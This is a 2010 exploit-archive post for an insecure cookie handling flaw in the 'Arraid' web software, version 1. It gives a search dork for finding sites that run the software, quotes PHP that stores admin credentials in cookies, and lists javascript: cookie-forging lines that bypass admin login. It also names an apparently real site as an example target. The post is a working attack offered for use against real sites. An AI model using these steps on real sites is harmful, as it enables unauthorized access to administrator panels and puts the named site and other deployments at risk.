alnjm33 on January 29, 2010: Arraid version 1. suffers from an insecure cookie handling vulnerability.

Arraid Insecure Cookie Handling



::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Exploit Title :  Arraid Insecure Cookie Handling Vulnerability
Author: alnjm33
Software Link: http://www.dz-goal.com/up/view.php?file=a88342493d
Version: 1
Tested on: Version 1
My home : Sec-war.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork==========================================
                                 (Powerd by Arraid )
================================Exploit=============================================
/admin/login.php
<?php
setcookie("name",$name,$time);  //AMMMMMMMM so bad
setcookie("pass",$pass,$time); // AMMMMMMMM so bad
?>
Exploit
WwW.SitE.CoM/admin/
javascript:document.cookie="name=$name;path=/admin/";
javascript:document.cookie="pass=$pass;path=/admin/";
After that
Browse the Adminpamel
WwW.SitE.CoM/admin/
e.g
http://www.halahasf.com/admin/
=======================================================================================
Greetz to : First to The Best Team In Africa( Egypt Football TEAM ) PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso - JaMbA - RoOt_EgY- jago-dz - XR57 all Sec-War.com members

Code Exploits Collection

Arraid Insecure Cookie Handling

Comments